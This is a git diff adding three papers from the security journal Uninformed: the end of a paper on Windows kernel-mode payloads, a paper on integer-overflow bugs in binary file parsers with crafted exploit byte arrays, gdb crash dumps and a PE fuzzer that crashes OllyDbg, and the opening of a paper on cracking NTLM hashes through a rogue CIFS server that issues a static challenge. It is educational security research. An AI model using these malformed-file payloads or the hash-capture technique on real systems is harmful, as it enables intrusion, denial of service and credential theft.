esp,byte +0x30 +00000027 FFE0 jmp eax + + +This implementation works by first obtaining the current thread context through +fs:0x124. Once obtained, a check is performed to see which operating system +the payload is running on by looking at the NtMinorVersion attribute of the +KUSER_SHARED_DATA structure. The reason this is necessary is because the +offsets needed to obtain the StartAddress of the thread and the offset that is +needed when restoring the stack are different depending on which operating +system is being used. After resolving the StartAddress and adjusting the stack +pointer to reflect what it would have been when the function was originally +called, all that's required is to transfer control to the StartAddress. + +This approach, at least in this specific implementation, may be closely tied to +vulnerabilities that occur in system worker thread routines, specifically those +that start at nt!ExpWorkerThread. However, the principals could be applied to +other system worker threads if the illustrated implementation proves limited. +It is also important to realize that since this method depends on undocumented +version-specific offsets, it is highly likely that it may not be portable to +new versions of the kernel. This approach should also be compatible with +Windows 2003 Server SP0/SP1, but the offsets are likely to be different and +have not been obtained or tested at this point. + +4.3.4) Lock Release + + +Judging from some of the other recovery methods described in this document, it +can be seen that one of the biggest limiting factors has to do with locks being +held when recovery is attempted. To deal with this problem, one would have to +implement a solution that was capable of releasing held locks prior to using a +recovery method. This is more of a theoretical solution than a concrete one, +but if it were possible to release locks held by a thread prior to recovery, +then it would be possible to use some of the more elegant recovery methods. As +it stands, though, the authors are not aware of a feasible solution to this +problem that is capable of releasing the various types of locks in a general +manner. Instead, it would most likely be better to attack this problem on a +per-vulnerability basis rather than attempting to come up with an +all-encompassing solution. + +Without a proper lock releasing solution, it is likely that even if a +vulnerability can be triggered, the box may deadlock. Again, this is highly +dependent on the vulnerability in question, but it's not something that should +be considered an academic concern. + +4.4) Stages + + +The purpose of the stage payload component is to perform whatever arbitrary +task is desired, whether it be to hook the keyboard and send key strokes to the +attacker or to spawn a reverse shell in the context of a user-mode process. +The definition of the stage component is very broad as to encompass pretty much +any end-goal an attacker might have. For that reason, this section is +relatively sparse on details and is instead left up to the reader to decide +what type of action they would like to perform. The paper eEye has provided +shows some concrete examples of kernel-mode stages. There are also many +examples of existing user-mode payloads that could be staged to run in the +context of a user-mode process. In the future, stages will most likely be the +focal point of kernel-mode payload research. + +5) Conclusion + + +This document has illustrated some of the general techniques that can be used +when implementing kernel-mode payloads. Examples have been provided for +techniques that can be used to locate the base address of nt and an example +routine has been provided to illustrate symbol resolution. To make kernel-mode +payloads easier to grasp, their anatomy has been broken down into four distinct +units that have been referred to as payload components. These four payload +components can be combined together to form a logical kernel-mode payload. + +The purpose of the migration payload component is to transition the processor +to a safe IRQL so that the rest of the payload can be executed. In some cases, +it's also necessary to make use of a stager payload component in order to move +the payload to another thread context or location for the purpose of execution. +Once the payload is at a safe IRQL and has been staged as necessary, the actual +meat of the payload can be run. This portion of the payload is symbolically +referred to as the stage payload component. After everything is said and done, +the kernel-mode payload has to find some way to ensure that the kernel does not +crash. To accomplish this, a situational recovery payload component can be +used to allow the kernel to continue to execute properly. + +While the vectors taken to achieve code execution have not been described in +this document, it is expected that there will continue to be research and +improvements in this field. A cycle similar to that seen for user-mode +vulnerabilities can be equally expected in the kernel-mode arena once enough +interest is gained. With the eye of security vendors intently focused on +solving the problem of user-mode software vulnerabilities, the kernel-mode +arena will be a playground ripe for research and discovery. + + +Bibliography + +Conover, Matt. Malware Profiling and Rootkit Detection on +Windows. +http://xcon.xfocus.org/archives/2005/Xcon2005_Shok.pdf; +accessed Dec. 12, 2005. + + +eEye Digital Security. Remote Windows Kernel Exploitation: +Step into the Ring 0. +http://www.eeye.com/ data/publish/whitepapers/research/OT20050205.FILE.pdf; +accessed Dec. 8, 2005. + + +skape. Safely Searching Process Virtual Address Space. +http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf; +accessed Dec. 12, 2005. + + +SoBeIt. How to Exploit Windows Kernel Memory Pool. +http://packetstormsecurity.nl/Xcon2005/Xcon2005_SoBeIt.pdf; +accessed Dec. 11, 2005. + + +System Inside. Sysenter. +http://system-inside.com/driver/sysenter/sysenter.html; +accessed Nov. 23, 2005. diff --git a/uninformed/3.3.txt b/uninformed/3.3.txt new file mode 100644 index 0000000..f2d812b --- /dev/null +++ b/uninformed/3.3.txt @@ -0,0 +1,599 @@ +Analyzing Common Binary Parser Mistakes +Orlando Padilla +xbud@g0thead.com +Last modified: 12/05/2005 + +Abstract: With just about one file format bug being +consistently released on a weekly basis over the past six to twelve +months, one can only hope developers would look and learn. The +reality of it all is unfortunate; no one cares enough. These bugs +have been around for some time now, but have only recently gained +media attention due to the large number of vulnerabilities being +released. Researchers have been finding more elaborate and passive +attack vectors for these bugs, some of which can even leverage a +remote compromise. + +No new attacks will be presented in this document, as examples and +an example file format will be presented to demonstrate an insecure +implementation of a parsing library. As a bonus for reading this +article, an undisclosed bug in a popular debugger will be released +during the case study material of this paper. This vulnerability, +if leveraged properly, will cause the debugger to crash during the +loading of a binary executable or dynamic library. + +Disclaimer: This document is written with an educational +interest and I cannot be held liable for any outcome of the +information being released. + + +Thanks: #vax, nologin, and jimmy haffa + += Introduction + + +A number of papers have already been written describing the +exploitation of integer overflows, however, very few publications +have been aimed at the exploitation of integer overflows within +binary parsers. The current slew of advisories released by iDefense +(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and +Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format +bugs should be enough to take these bugs seriously. + + +The most common mistake applied by a programmer is in trusting a +field inside a binary structure that should not be trusted. During +the design phase: efficiency, simplicity and the secure +implementation of a particular project should be at the top of the +priority list. When dealing with data that cannot be presented only +as strings, a length field is required to tell the application when +to stop reading. When dealing with sections that must have +subsections, knowing ahead of time how many sections are embedded +within the primary section of a structure is required and again, a +value must be used to instruct the application only to iterate +x number of times. In the following paragraphs, the +description of a binary file structure will be presented, followed +by applied examples of typical coding errors encountered when +auditing applications. An overview of integer overflows will be +discussed for the sake of completeness. Finally, a case study of +several bugs found during the research of a particular file format +will be shown. + += Certificate Storage File + + +The following file format was designed and written specifically for +this article and has no real world applicable use. The general idea +behind the implementation of this file format is to create a single +binary file acting as a searchable database for certificate files. +The file will consist of two core structures, which will hold the +information necessary to parse the certificates in DER format. This +is a rough diagram of what the file looks like after compilation: + + +----------------------+-----------+---------+ + | Structure | Offset | Size | + +----------------------+-----------+---------+ + | OP Header | 0 | 4 | + | Element Count | 4 | 2 | + | Cert File Fmt Struct | 6 | 6 | + | Cert Data Struct | 12 | 16 | + | Cert 1 | | | + | Cert 2 | | | + | Cert | | | + | Cert n | | | + +----------------------+-----------+---------+ + + += Binary Layout + + + +The following structures are defined on the file format's compiler +library. + + +typedef struct _CERTFF +{ + unsigned int NumberOfCerts; + unsigned short PointerToCerts; +}CERTFF,*PCERTFF; + +typedef struct _CERTDATA +{ + char Name[8]; + unsigned short CertificateLen; + unsigned short PointerToDERs; + unsigned char *DataPtr; +}CERTDATA,*PCERTDATA; + + +The first data structure consists of two unsigned integers, (short) +NumberOfCerts and (long) PointerToCerts. These hold the number of +certificates in total, stored in this binary NumberOfCerts and the +offset from the beginning of the file to the first certificate data +structure CERTDATA PointerToCerts. We can already assume that a +parser will iterate through the image file NumberOfCerts times, +starting from PointerToCerts in chunks of the size of CERTDATA at a +time. The second data structure consists of a character array 8 +bytes in size, which is used to hold the first 7 characters of a +certificate's description, followed by two unsigned short integers +which hold the length of the certificate referred to by this +structure, and the offset to the beginning of the certificate +respectively. The last element is an unsigned char, which is used +to carry the body of the certificate by the compiler. + += Applied Examples + + +As the number of buffer overflows decreases, the number of integer +overflows and improper file and binary protocol parsing bugs +increases. The following URL query to OSVDB's (Open Source +Vulnerability) database for integer overflows is a perfect example +of the diversity of applications affected. The list is rather short +considering the number of vulnerabilities actually released in the +past two - three years. Still, it accurately displays different +levels of severity: Kernel, Library, Protocol and file format bugs. + +http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search + + +As a proof of concept, I developed a parsing library for the +construct above. See Appendix A for code. The code functionality +is simple. As explained above it consolidates certificates (in this +example) into a single file. There are several bugs in the library +that I mocked from actual implementations of different open source +and closed source applications. The first vulnerability exists in +the single cert extraction tool 'certextract.c'. The issue is +pretty obvious; the library trusts that the file being parsed has +not been tampered with. The following code snippet highlights the +issue: + + +igned char cert_out[MAX_CERT_SIZE]; +16 unsigned char *extract_cert = "req1.DER"; +... +64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert)); +65 +66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen); +... + + +The vulnerability exists because the library assumes the certificates +will not be larger than MAX_CERT_SIZE due to the compiler's +inability to take files larger than the set size. All an attacker has +to do is modify the file using an external editor or reverse engineering +the file format and creating a malicious certificate db. A step-by-step +example on exploitation of this bug is out of the scope of this +document, but let's look at what has to be done to prepare an exploit +for this vulnerability. + + +We already know we have to modify the length field to something +larger than MAX_CERT_SIZE or if we look specifically at +'certlib.h', larger than 2048 bytes. Looking at the structure of +the headers, we can see that each certificate has its own length +field. So creating a valid structure header and placing it at a +correct offset along with a corresponding payload should do the +trick. With this in mind, calculate the number of bytes from the +beginning of the file to the first certificate. + + +[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct] + + +It seems we can drop our fake structure after the 12th byte. The +cert structure will look something like the following (depending on +the size of the payload you are using): + + +unsigned char exploit_dat1[] = { + + /* Name of our fake cert */ + 0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, + /* our, length */ + 0x53, 0x08, + /* where we can write our data, PointerToDer*/ + 0x18, 0x00, + /* DataPtr just for completion */ + 0x00, 0x00, 0x00, 0x00 +}; + + +Notice the length is an unsigned short integer that limits our payload +to 0xFFFF (65535), which should be more than enough space. The +two most important sections of our structure are the length, and the value +we give PointerToDer since this will point to the beginning of our +payload. Since we are choosing to make our fake certificate the first +one on the list, anything below it can be overwritten with little +concern. At offset 0x18 of the dat file we have 0x0853 +bytes of A's, notice there is no bounds check on this value. Below is a +sample run of a valid certsdb.dat file and a second sample run with our +malicious dat file. + + +(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER +cert req1.DE +len: 657 PtrToData: 90 + +(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER +e3e45e30b18a6fc9f6134f0297485cc1 req1.DER +e3e45e30b18a6fc9f6134f0297485cc1 out.DER + +(gdb) r ./badcertdb.dat out.DER +Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER +cert req1.DE +len: 2131 PtrToData: 27 + +Program received signal SIGSEGV, Segmentation fault. +0x41414141 in ?? () + + +The actual exploitation of this vulnerability is left as an exercise +for the reader, given the file structure necessary to build the attack +it is now trivial to complete. + += Continuing Applied Examples + + +The utility 'certdb2der.c' provided in this example suite iterates +through the dat file and dumps the contents of each certificate into +individual files. The CERTFF (Certificate File Format) structure +contains an element called NumberOfCerts of type unsigned int. This +integer explicitly controls the loop iterator, controlling the number +of CERTDATA structures said to be in the body of dat file. + + +59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT); +60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA); +61 +62 pCertData = (PCERTDATA)malloc(alloc_size); +63 +64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1); + + +An integer overflow condition may be triggered during memory allocation +for the 'pCertData' array of structures. If a specially crafted dat +file contains a high enough value during memory allocation, pCertDat +array is deemed inproper by the multiplication in +line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA). +The maximum value for an unsigned integer is (4294967295) or +0xffffffff, so when the value at NumberOfCerts is multiplied +by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value +to wrap resulting in an invocation negative malloc() or a malloc(0). +This could then be leveraged into executing arbitrary code on certain +malloc implementations by overwriting control structures in the heap. +Again, exploitation is not covered in detail, but pre-exploitation is +explained below. Please refer to the references section for papers +covering heap overflow exploitation. + + +Constructing a fake valid CERTFF chunk and properly placing it in a dat +file will be what most of the work consists of when preparing for file +format exploit. The first 6 bytes of our file will remain the same, so +we can assume our exploit to look something to the following: + + +[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...] +[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ] + + +unsigned char exploit_dat1[] = { + /* header info */ + 0x4f, 0x50, 0x00, 0x00, 0x01, 0x00, + /* our length followed by our certs pointer */ + 0xff, 0xff, 0xff, 0xff, + 0x0a, 0x00, + /* One valid cert */ + 0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, + /* our length */ + 0x00, 0x07, + /* where we can write our data to PointerToDer*/ + 0x00, 0x26, + /* DataPtr useless to us */ + 0x00, 0x00, 0x00, 0x00, +}; + +unsigned char exploit_dat2[] = { + /* fake certs for fill */ + 0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00, + /* our length */ + 0x00, 0x10, + /* where we can write our data to PointerToDer*/ + 0x26, 0x04, + /* DataPtr useless to us */ + 0x00, 0x00, 0x00, 0x00, +}; + + +The pseudo code below denotes the structure of the rest of the binary +dat file. + + +for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2)) + memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2)); + + +In short, the code copies the contents of our second structure +, after the 24th byte till the end of the buffer is +reached. The following displays an iteration of the utility used correctly, +followed by an iteration through the malicious certificates db file. + + +(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat +req1.DE of length: 657 is being written to disk... +req2.DE of length: 649 is being written to disk... +req3.DE of length: 653 is being written to disk... +req4.DE of length: 651 is being written to disk... +req5.DE of length: 652 is being written to disk... +(xbud@yakuza <~/code/random>) $ + +(gdb) r 2badcertdb.dat +Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat + +Program received signal SIGSEGV, Segmentation fault. +0xb7e1267f in memcpy () from /lib/tls/libc.so.6 +(gdb) x/i $pc +0xb7e1267f : repz movsl %ds:(%esi),%es:(%edi) +(gdb)i reg +eax 0xffffffff -1 +ecx 0x3fff9c02 1073716226 +edx 0x804a008 134520840 +... + + +Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value +stored in eax is -1 which when converted to unsigned inside memcpy, 4GB +of data are copied into our destination buffer of only 0x800 bytes in +size. + += Case Study += The Microsoft PE/COFF Headers + + +There a number of documents and tools out there that explain the +structure of Microsoft's infamous PE (Portable Executable) and old +Unix Style COFF (Common Object File Format) header. As such, I will +refrain from elaborating on what each element inside each structure +does. Instead, I will focus on the critical sections that may allow +an attacker to alter the contents of header elements specifically to +break implementations of PE/COFF parsers. + + +With that in mind we can now begin our journey into the world of PE. +At file offset 0x3C as specified in MS's pecoff.doc, there is a four +byte signature PE, immediately after the signature of the +image file, there is a standard COFF header of the following format: + + +IMAGE_FILE_HEADER //(Coff) +{ + unsigned short Machine; + unsigned short NumberOfSections; + unsigned int TimeDateStamp; + unsigned int PointerToSymbolTable; + unsigned int NumberOfSymbols; + unsigned short SizeOfOptionalHeader; + unsigned short Characteristics; +} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; + + +Does anything look similar to our hypothetical file format used in +the examples above? + + +NumberOfSections and NumberOfSymbols are all synonymous to +NumberOfCerts with respect to their own file format. These +elements, along with SizeOfOptionalHeader make for interesting +attack vectors. Before strolling further along into the COFF Header +specifics, it is important to pay a bit more attention to the offset +0x3C being referred to in the PECOFF.doc document. It +states that the file offset specified at offset 0x3C from +the image file, points to the PE signature. + + +What would happen if this file offset was bogus? What if the offset +at offset 0x3C points to fstat(image).st_size + 1 ? +We cause the parser to access illegal memory. This bug was present in +the majority of the PE Viewers tested. Although the significance of this +bug is minimal since the modified binary will no longer execute, picture a +scenario where an attacker simply needs to crash an application which +happens to preprocess a PE Header? All an attacker must do to trigger +this bug is build a fake MZ header also known as a Dos Stub header and +invalidate the 0x3C offset. The MS-DOS Stub is a +valid application that runs under MS-DOS and is placed at the front of the +.EXE image. The linker places a default stub here, which prints out the +message "This program cannot be run in DOS mode" when the image is run in +MS-DOS. + + +The second element, NumberOfSections, indicates the number of +Section Headers this file has mapped. Once again, fuzzing this +element with random numbers yields interesting results on tools +like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc... + + +Continuing our dive into PE madness, following the COFF Header there +is an OPTIONAL_HEADER also referred to as the PE Header which +consists of the following elements: + + +_IMAGE_OPTIONAL_HEADER32 { + unsigned short Magic; + ... + unsigned int ImageBase; + ... + unsigned short MajorOperatingSystemVersion; + unsigned short MinorOperatingSystemVersion; + ... + unsigned int SizeOfImage; + unsigned int SizeOfHeaders; + ... + unsigned int LoaderFlags; + unsigned int NumberOfRvaAndSizes; + IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; +} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; + + +There were a number of elements omitted here for the sake of brevity, +most of which aid the loader in identifying the type of file and its +core mappings. Please refer to the appendix for more information on +what each specific element means. Again, several elements in this +structure look interesting enough to play with, however we will only be +looking at the IMAGE_DATA_DIRECTORY array of entries. In +particular, the first index of that directory contains a pointer to the + structures. The element EXPORT/IMPORT_DIRECTORY_TABLE +NumberOfRvaAndSizes in the structure above refers to the number of +elements in the DataDirectory array. The following is the + structure which is the last structure +fuzzed for this case study. + + + +_EXPORT_DIRECTORY_TABLE { + unsigned long Characteristics; + unsigned long TimeDateStamp; + unsigned short MajorVersion; + unsigned short MinorVersion; + unsigned long NameRVA; + unsigned long OrdinalBase; + unsigned long NumberOfFunctions; + unsigned long NumberOfNames; + unsigned long ExportAddressTableRVA; + unsigned long ExportNameTableRVA; + unsigned long ExportOrdinalTableRVA; +} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE; + + + The Export Directory Table contains address information that is +used to resolve fix-up references to the entry points within this image. +The elements NumberOfFunctions, NumberOfNames indicate the obvious and +again if something trusts the number in this structure without error +checking, unexpected results can occur. + += Introducing breakdance.c + + +Although file fuzzing is relatively simple, tools help reduce the amount +of time it takes for you to reconstruct a format to reach deep into a +section buried within several structures. I typically use +xxd -i, hd (hexdump), or shred (hexeditor) +for windows to reconstruct a binary image and fuzz the structures +manually, but I decided to develop a tool to do the work for me in the +case of PE. The following options are available: + + +Usage: ./breakdance [parameters] +Options: + -v verbose + -o [file] File to write to (defaults) out.ext + -f [file] File to read from + -e [value] Modify Export Directory Table's number + of functions and number of names + -p Print sections of a PE file and exit + -c Create new section (.pepe) not to be used with -m + -s [section] Section to overwrite (can be used with -c) + -m [section] [value] + -n [length] Fuzz Export Directory Table's Strings + Modify [section] with [int] where: + section is one of [image_start] [number_of_sections] + + ex. ./breakdance -v -o out -f pebin -m "image_start" 65536 + ex. ./breakdance -v -o out -f pebin -c -s .rdata + +[Warning if -o option isn't provided with mod options, changes are discarded] + + +The following is a list of binary parsers affected by the fuzzing options +provided by breakdance.c, the list is by no means comprehensive in the +sense of PE parsers but it is all I test against. The fuzzing capabilities +are rather minimal considering the number of structures and elements +accompanied by the PE/COFF specification, however it is enough to +demonstrate how broken, binary parsers can be. + + + +--------------+-----------------+-------------------+ + | Tool Name | Vendor | Section | + +--------------+-----------------+-------------------+ + | PE View | Wayne Radburn | All | + | MSVS bindump | Microsoft | All | + | OllyDbg | Oleh Yuschuk | NumberOfFunctions | + | PE Explorer | Haeventools.com | NumberOfSections | + +--------------+-----------------+-------------------+ + + += Affected Toolsets + + + +Although I can almost guarantee other parsers are just as buggy, +this selection is pretty well known and should suffice as a +demonstration. The only issue I will elaborate on is the OllyDebug +denial of service attack. This issue is interesting due to the fact +that even after modifying the PE Image to DoS OllyDebug, the binary +itself is still executable. This can be leveraged as an attack +vector against reverse engineerers who rely on olly debug to reverse +binaries. The following is a run of breakdance against a DLL. + + +(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \ +/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll + +... + +NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647 +Dumping 348160 bytes + +(xbud@yakuza <~/code/random>) $ + +-- Inside WinDbg -- + +This exception may be expected and handled. +eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000 +eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293 + +*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\tools\odbg110\OLLYDBG.EXE - + +OLLYDBG!Createlistwindow+0x1bb4: +0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=???? + +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4 +00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b + + += Conclusions + + +The general rule of thumb here is not to trust any user modifiable +data. The trust between application and input components such as +sockets, file I/O, named pipes etc. should always be minimal and at +an extreme, should be considered dangerous. The fact that a file +format specification exists is not an excuse to assume all data +gathered from an alleged file is valid. Validate your input against +a working ruleset, and if the assertion fails, raise an exception. +Keeping your code simple means accept only valid input, deny all +variants. + + +All the code referenced is provided in the attached tar ball, a +safer version of the library for parsing the hypothetical file +format developed for this paper is included for demonstration +purposes. + += Bibliography + + +OSVDB. OSVDB Advisory Descriptions +http://www.osvdb.org + + +Microsoft Corporation. PECoff Specification +http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx + + +blexim. Integer Overflows +http://www.phrack.org/show.php?p=60&a=10 diff --git a/uninformed/3.4.txt b/uninformed/3.4.txt new file mode 100644 index 0000000..c9dbdc4 --- /dev/null +++ b/uninformed/3.4.txt @@ -0,0 +1,458 @@ +Attacking NTLM with Precomputed Hashtables +warlord +warlord@nologin.org + + +1) Introduction + + +Breaking encrypted passwords has been of interest to hackers for a long +time, and protecting them has always been one of the biggest security +problems operating systems have faced, with Microsoft's Windows being no +exception. Due to errors in the design of the password encryption +scheme, especially in the LanMan(LM) scheme, Windows has a bad track in +this field of information security. Especially in the last couple of +years, where the outdated DES encryption algorithm that LanMan is based +on faced more and more processing power in the average household, +combined with ever increasing harddisk size, made it crystal clear that +LanMan nowadays is not just outdated, but even antiquated. + +Until now, breaking the LanMan hashed password required somehow +accessing the machine first of all, and grabbing the password file, +which didn't render remote password breaking impossible, but as a remote +attacker had to break into the system first to get the required data, it +didn't matter much. This paper will try to change this point of view. + + +2) The design of LM and NTLM + +2.1) The LanMan disaster + + +By default Windows stores all users passwords with two different hashing +algorithms. The historically weak LanMan hash and the more robust MD4. +The LanMan hash is based on DES and has been described in Mudge's rant +on the topic. A brief recap of the LM hash is below, though those +unfamilliar with LM will probably want to read. + +First of all, Windows takes a password and makes sure it's 14 bytes +long. If it's shorter than 14 bytes, the password is padded with null +bytes. Brute forcing up to 14 characters can take a very long time, but +two factors make this task way more easy. First, not only is the set of +possible characters rather small, Microsoft further reduces it by making +sure a password is stored all uppercase. That means "test" is the same +as "Test" is the same as "tesT" is the same as...well...you get the +idea. Second, the password is not really 14 bytes in size. Windows +splits it up into two times 7 bytes. So instead of having to brute force +up to 14 bytes, an attacker only has to break 7 bytes, twice. The +difference is (keyspace^14) versus (keyspace^7)*2. That's a huge +difference. + +Concerning the keyspace, this paper focuses on the alphanumerical set of +characters only, but the entire possible set of valid characters is: + + +ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 %!@\#$%^&*()_-=+`~[]\{}|\:;"'<>,.?/ + + +The next problem with LM stems from the total lack of salting or cipher +block chaining in the hashing process. To hash a password the first 7 +bytes of it are transformed into an 8 byte odd parity DES key. This key +is used to encrypt the 8 byte string "KGS!@". Same thing happens with +the second part of the password. + +This lack of salting creates two interesting consequences. Obviously +this means the password is always stored in the same way, and just begs +for a typical lookup table attack. The other consequence is that it is +easy to tell if a password is bigger than 7 bytes in size. If not, the +last 7 bytes will all be null and will result in a constant DES hash of +0xAAD3B435B51404EE. + +As I already pointed out, LM has been extensively documented. +"L0phtcrack" and "John the Ripper" are both able brute force tools to +break these hashes, and Philippe Oechslin of the ETH Zuerich was the +first to precompute LM lookup tables that allow breaking these hashes in +seconds. + +2.2) NTLM + + +Microsoft attempted to address the shortcomings of LM with NTLM. Windows +NT introduced the NTLM(NT LanManager) authentication method to provide +stronger authentication. The NTLM protocol was originally released in +version 1.0(NTLM), and was changed and fortified in NT SP6 as NTLMv2. +When exchanging files between hosts in a local area network, printing +documents on a networked printer or sending commands to a remote system, +Windows uses a protocol called CIFS - the Common Internet File System. +CIFS uses NTLM for authentication. + +In NTLM, the protocol covered in this document, the authentication works +in the following manner. When the client connects to the server and +requests a new session, the server replies with a positive session +response. Next, the client sends a request to negotiate a protocol for +one of the many dialects of the SMB/CIFS family by providing a list of +dialects that it understands. The server picks the best out of those and +sends the client a response that names the protocol to use, and includes +a randomly generated 8 byte challenge. + +In order to log in now, the client sends the username in plaintext(!), +and also the password, hashed NTLM style. The NTLM hash is generated in +the following manner: + + +[UsersPassword]->[LMHASH]->[NTLM Hash] + + +The NTLM hash is produced by the following algorithm. The client takes +the 16 byte LM hash, and appends 5 null bytes, so that the result is a +string of 21 bytes length. Then it splits those 21 bytes into 3 groups +of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES +key once again. Now the first key is used to encrypt the challenge with +the DES algorithm, producing an 8 byte hash. The same is done with keys +2 and 3, so that there are two additional 8 byte hashes. These 3 hashes +are simply concatenated, resulting in a single 24 byte hash, which is +the one being sent by the client as the encrypted password. + +Mudge already pointed out why this is really stupid, and I'll just +recapitulate his reasons here. An attacker capable of sniffing traffic +can see the username, the challenge and the 24 byte hash. + +First of all, as stated earlier, if the password is less than 8 bytes, +the second half of the LM hash always is 0xAAD3B435B51404EE. For the +purpose of illustration, let's assume the first part of the hash is +0x1122AABBCCDDEEFF. So the entire LM hash looks like: + + +------------------------------------------- +| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE | +------------------------------------------- + + +When transforming this into an NTLM hash, the first 8 bytes of the new +hash are based solely on the first 7(!) bytes of the LM hash. The second +8 byte chunk of the NTLM hash is based on the last byte of the first LM +hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of +the second LM hash left. Those two, padded with 5 null bytes and used to +encrypt the challenge, form the third 8 byte chunk of the NTLM hash. +That means in the example this padded LM hash + + +------------------------------------------------------ +| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 | +------------------------------------------------------ + + +is being turned into the 24 byte NTLM hash. If the password is smaller +than 8 characters in size, the third part, before being hashed with the +challenge to form the NTLM hash, will always look like this. So in order +to test wether the password is smaller than 8 bytes, it's enough to take +this value, the 0x04EE0000000000, and use it to encrypt the challenge +that got sniffed from the wire. If the result equals the third part of +the NTLM hash which the client sent to the server, it's a pretty safe +bet to say the password is no longer than 7 chars. It's even possible to +make sure it is. Assuming from the previous result that the second LM +hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM +hash is based on 0x??AAD3B435B514. The only part unknown is the first +byte, as this one is based on the first LM hash. One byte, thats 256 +permutations. By brute forcing those up to 256 possibilities as the +value of the first byte, and using the resulting key to encrypt the +known challenge once again, one should eventually stumble over a result +that's the same as the second 8 bytes of the NTLM hash. Now one can rest +assured, that the password really is smaller than 8 bytes. Even if the +password is bigger than 7 bytes, and the second LM hash does not end +with 0x04EE thus, creating all possible 2 byte combinations, padding +them with 5 null bytes and hashing those with the challenge until the +final 8 byte chunk of the NTLM hash matches will easily reveal the final +2 byte of the LM hash, with no more than up to 64k permutations. + +2.3) The NTLM challenge + + +The biggest difference between the way the LM and the NTLM hashing +mechanism works is the challenge. In NTLM the challenge acts like a a +salt in other cryptographic implementations. This throws a major wrench +in our pre-computing table designs, adding 2^64 permutations to the +equation. + +3.0) Breaking NTLM with precomputed tables + +3.1) Attacking the first part + +Precomputing tables for NTLM has just been declared pretty much +impossible with todays computing resources. The problem is pre-computing +every possible hash value (and then, of course storing those values even +if computation was possible). By applying a trick to remove the +challenge from the equation however, precomputing NTLM hashes becomes +almost as easy as the creation of LM tables. By writing a rogue CIFS +server that hands out the same static challenge to every client that +tries to connect to it, the problem has static values all over the place +once again, and hashtable precomputation becomes possible. + +The following screenshot depicts a proof of concept implementation that +accepts an incoming CIFS connection, goes through the protocol +negotiation phase with the connecting client, sends out the static +challenge, and disconnects the client after receiving username and NTLM +hash from it. The server also logs some more information that the client +conveniently sends along. + + +IceDragon wincatch bin/wincatch +This is Alpha stage code from nologin.org +Distribution in any form is denied + + +Src Name: BARRIERICE +IP: 192.168.7.13 +Username: Testuser +Primary Domain: BARRIERICE +Native OS: Windows 2002 Service Pack 2 2600 +Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666 + + +That's a Windows XP machine connecting to the rogue server running +on Linux. The client is connecting from IP address 192.168.7.13. The +username is ``Testuser'', the name of the host is ``BarrierIce'', +and the password hash got captured too of course. + +3.2) Table creation + + +The creation of rainbow tables to precompute the hashes is a good +approach to easily breaking the hashes now, but as harddisks grow bigger +and bigger while costing ever less, I decided to roll my own table +layout instead. As the reader will see, my approach requires way more +harddisk space than rainbow tables do since they are computationally +less expensive to create and contain a determined set of data, unlike +rainbow tables with their less than 100 probability approach to contain +a certain password. + +In order to create those tables, the big question is how to efficiently +store all the data. In order to stay within certain bounds, I decided to +stick to alphanumeric tables only. Alphanumeric, that's 26 chars from +a-z, 26 chars from A-Z, and additional 10 for 0-9. Thats 62 possible +values for each character, so thats 62^7 permutations, right? Wrong. +NTLM hashes use the LM hash as input. The LM hashing algorithm +upper-cases its input. Therefore the possible keyspace shrinks to 36 +characters, and the number of possible permutations goes down to 